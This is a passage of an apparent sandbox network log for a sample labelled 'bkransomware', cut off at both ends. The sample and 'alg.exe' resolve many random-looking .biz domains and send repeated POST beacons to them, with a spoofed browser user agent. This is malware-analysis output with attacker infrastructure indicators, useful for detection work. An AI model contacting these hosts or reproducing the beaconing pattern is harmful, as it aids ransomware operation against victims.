Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pwlqfu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:34 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=911a3e618c9cad4b23d54241744250c1|194.110.13.70|1723257694|1723257694|0|1|0; path=/; domain=.pwlqfu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

rrqafepng.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

rrqafepng.biz

IN A

Response

rrqafepng.biz

IN A

47.129.31.212
POST

http://rrqafepng.biz/opolpfukjifrdf

alg.exe

Remote address:

47.129.31.212:80

Request

POST /opolpfukjifrdf HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: rrqafepng.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:35 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=ed2a6e16c479db1f98953f50a1b56969|194.110.13.70|1723257695|1723257695|0|1|0; path=/; domain=.rrqafepng.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

jwkoeoqns.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

jwkoeoqns.biz

IN A

Response

jwkoeoqns.biz

IN A

18.208.156.248
POST

http://jwkoeoqns.biz/ksww

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

18.208.156.248:80

Request

POST /ksww HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jwkoeoqns.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:35 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=a2e1dbd739b7408f2fb5a40e21c048cd|194.110.13.70|1723257695|1723257695|0|1|0; path=/; domain=.jwkoeoqns.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

xccjj.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

xccjj.biz

IN A

Response

xccjj.biz

IN A

44.213.104.86
POST

http://xccjj.biz/lsafplpxmxlox

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

44.213.104.86:80

Request

POST /lsafplpxmxlox HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: xccjj.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:35 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=3b794d998840164cbab5669df90a3d78|194.110.13.70|1723257695|1723257695|0|1|0; path=/; domain=.xccjj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

hehckyov.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

hehckyov.biz

IN A

Response

hehckyov.biz

IN A

44.221.84.105
POST

http://hehckyov.biz/dehnogj

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

44.221.84.105:80

Request

POST /dehnogj HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: hehckyov.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:35 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=13e33e1e6129e6c68ee3d7c448487096|194.110.13.70|1723257695|1723257695|0|1|0; path=/; domain=.hehckyov.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

ctdtgwag.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

ctdtgwag.biz

IN A

Response

ctdtgwag.biz

IN A

3.94.10.34
POST

http://ctdtgwag.biz/nibxswmiugqsh

alg.exe

Remote address:

3.94.10.34:80

Request

POST /nibxswmiugqsh HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ctdtgwag.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:35 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=282570c4bc2ad96c02afcabf562b8188|194.110.13.70|1723257695|1723257695|0|1|0; path=/; domain=.ctdtgwag.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

rynmcq.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

rynmcq.biz

IN A

Response

rynmcq.biz

IN A

54.244.188.177
POST

http://rynmcq.biz/q

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

54.244.188.177:80

Request

POST /q HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: rynmcq.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:36 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=15e96da7ef1c7dcecbfd6648ad06d657|194.110.13.70|1723257696|1723257696|0|1|0; path=/; domain=.rynmcq.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

tnevuluw.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

tnevuluw.biz

IN A

Response

tnevuluw.biz

IN A

35.164.78.200
POST

http://tnevuluw.biz/etihyknx

alg.exe

Remote address:

35.164.78.200:80

Request

POST /etihyknx HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: tnevuluw.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:36 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=6dafa69fa9dd7427c8cdf8cec651347f|194.110.13.70|1723257696|1723257696|0|1|0; path=/; domain=.tnevuluw.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

uaafd.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

uaafd.biz

IN A

Response

uaafd.biz

IN A

3.254.94.185
POST

http://uaafd.biz/s

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

3.254.94.185:80

Request

POST /s HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: uaafd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:36 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=0c44560e1837f5d58593964d9d0a212c|194.110.13.70|1723257696|1723257696|0|1|0; path=/; domain=.uaafd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

whjovd.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

whjovd.biz

IN A

Response

whjovd.biz

IN A

18.141.10.107
POST

http://whjovd.biz/cwcbrxb

alg.exe

Remote address:

18.141.10.107:80

Request

POST /cwcbrxb HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: whjovd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:37 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=db9a8f212a8e2496f52228ebdbca18b3|194.110.13.70|1723257697|1723257697|0|1|0; path=/; domain=.whjovd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

eufxebus.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

eufxebus.biz

IN A

Response

eufxebus.biz

IN A

18.141.10.107
POST

http://eufxebus.biz/ptkvnnoblotaspt

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

18.141.10.107:80

Request

POST /ptkvnnoblotaspt HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: eufxebus.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:37 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=f088159af8cf0aa7ccbf3a16fdd8a9e0|194.110.13.70|1723257697|1723257697|0|1|0; path=/; domain=.eufxebus.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

gjogvvpsf.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

gjogvvpsf.biz

IN A

Response

gjogvvpsf.biz

IN A

208.100.26.245
DNS

gjogvvpsf.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

gjogvvpsf.biz

IN A
DNS

reczwga.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

reczwga.biz

IN A

Response

reczwga.biz

IN A

44.221.84.105
POST

http://reczwga.biz/eafsxqlvdarkclbx

alg.exe

Remote address:

44.221.84.105:80

Request

POST /eafsxqlvdarkclbx HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: reczwga.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:39 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=271fcf28284d5a02cd16badd7ae46aa7|194.110.13.70|1723257699|1723257699|0|1|0; path=/; domain=.reczwga.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

bghjpy.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

bghjpy.biz

IN A

Response

bghjpy.biz

IN A

34.211.97.45
POST

http://bghjpy.biz/dltbwlflsvq

alg.exe

Remote address:

34.211.97.45:80

Request

POST /dltbwlflsvq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: bghjpy.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:39 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=c82e5fbe6b8e65e56ed149df2e481c1e|194.110.13.70|1723257699|1723257699|0|1|0; path=/; domain=.bghjpy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

damcprvgv.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

damcprvgv.biz

IN A

Response

damcprvgv.biz

IN A

18.208.156.248
POST

http://damcprvgv.biz/ddcogfgqgnbmdg

alg.exe

Remote address:

18.208.156.248:80

Request

POST /ddcogfgqgnbmdg HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: damcprvgv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:40 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=d5e25877a255c58dd09d279d49b1d6f9|194.110.13.70|1723257700|1723257700|0|1|0; path=/; domain=.damcprvgv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

ocsvqjg.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

ocsvqjg.biz

IN A

Response

ocsvqjg.biz

IN A

3.254.94.185
DNS

ocsvqjg.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

ocsvqjg.biz

IN A
DNS

ocsvqjg.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

ocsvqjg.biz

IN A
DNS

pwlqfu.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

pwlqfu.biz

IN A

Response

pwlqfu.biz

IN A

34.246.200.160
DNS

pwlqfu.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

pwlqfu.biz

IN A

Response

pwlqfu.biz

IN A

34.246.200.160
POST

http://pwlqfu.biz/gtvrbhfoanady

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

34.246.200.160:80

Request

POST /gtvrbhfoanady HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pwlqfu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:41 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=b1eb28da6373f153117e3fc58ace889c|194.110.13.70|1723257701|1723257701|0|1|0; path=/; domain=.pwlqfu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

rrqafepng.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

rrqafepng.biz

IN A

Response

rrqafepng.biz

IN A

47.129.31.212
DNS

rrqafepng.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

rrqafepng.biz

IN A

Response

rrqafepng.biz

IN A

47.129.31.212
POST

http://rrqafepng.biz/vcxvcowwqmm

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

47.129.31.212:80

Request

POST /vcxvcowwqmm HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: rrqafepng.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:42 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=c6e58b84ca88beff0ef4b639b1590d3a|194.110.13.70|1723257702|1723257702|0|1|0; path=/; domain=.rrqafepng.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://ocsvqjg.biz/towjpkre

alg.exe

Remote address:

3.254.94.185:80

Request

POST /towjpkre HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ocsvqjg.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:41 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=950982e86e30b03264c13b73ef2f94b8|194.110.13.70|1723257701|1723257701|0|1|0; path=/; domain=.ocsvqjg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

ywffr.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

ywffr.biz

IN A

Response

ywffr.biz

IN A

54.244.188.177
POST

http://ywffr.biz/cialfll

alg.exe

Remote address:

54.244.188.177:80

Request

POST /cialfll HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ywffr.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:42 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=ebffa49ccc7371e35a45befbafd03d6d|194.110.13.70|1723257702|1723257702|0|1|0; path=/; domain=.ywffr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

ecxbwt.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

ecxbwt.biz

IN A

Response

ecxbwt.biz

IN A

54.244.188.177
DNS

ecxbwt.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

ecxbwt.biz

IN A
DNS

ctdtgwag.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

ctdtgwag.biz

IN A

Response

ctdtgwag.biz

IN A

3.94.10.34
POST

http://ctdtgwag.biz/levjus

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

3.94.10.34:80

Request

POST /levjus HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ctdtgwag.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:42 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=30a2d41da811e1d19cf2e33483daa837|194.110.13.70|1723257702|1723257702|0|1|0; path=/; domain=.ctdtgwag.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://ecxbwt.biz/c

alg.exe

Remote address:

54.244.188.177:80

Request

POST /c HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ecxbwt.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:42 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=4fd5cd23e1c0d97fb04d2614f9ed1361|194.110.13.70|1723257702|1723257702|0|1|0; path=/; domain=.ecxbwt.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

tnevuluw.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

tnevuluw.biz

IN A

Response

tnevuluw.biz

IN A

35.164.78.200
DNS

tnevuluw.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

tnevuluw.biz

IN A

Response

tnevuluw.biz

IN A

35.164.78.200
POST

http://tnevuluw.biz/ioqhrbxykhf

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

35.164.78.200:80

Request

POST /ioqhrbxykhf HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: tnevuluw.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:43 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=77dea603bfa0dd0d25415213b5b241c4|194.110.13.70|1723257703|1723257703|0|1|0; path=/; domain=.tnevuluw.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

pectx.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

pectx.biz

IN A

Response

pectx.biz

IN A

44.213.104.86
POST

http://pectx.biz/lrhajojaonilviwc

alg.exe

Remote address:

44.213.104.86:80

Request

POST /lrhajojaonilviwc HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pectx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:43 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=2e50d6656ae857609b10704f6118c3be|194.110.13.70|1723257703|1723257703|0|1|0; path=/; domain=.pectx.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

whjovd.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

whjovd.biz

IN A

Response

whjovd.biz

IN A

18.141.10.107
DNS

zyiexezl.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

zyiexezl.biz

IN A

Response

zyiexezl.biz

IN A

18.208.156.248
POST

http://zyiexezl.biz/rkmfaitlvd

alg.exe

Remote address:

18.208.156.248:80

Request

POST /rkmfaitlvd HTTP/1.1
Cache-Control: no-cache
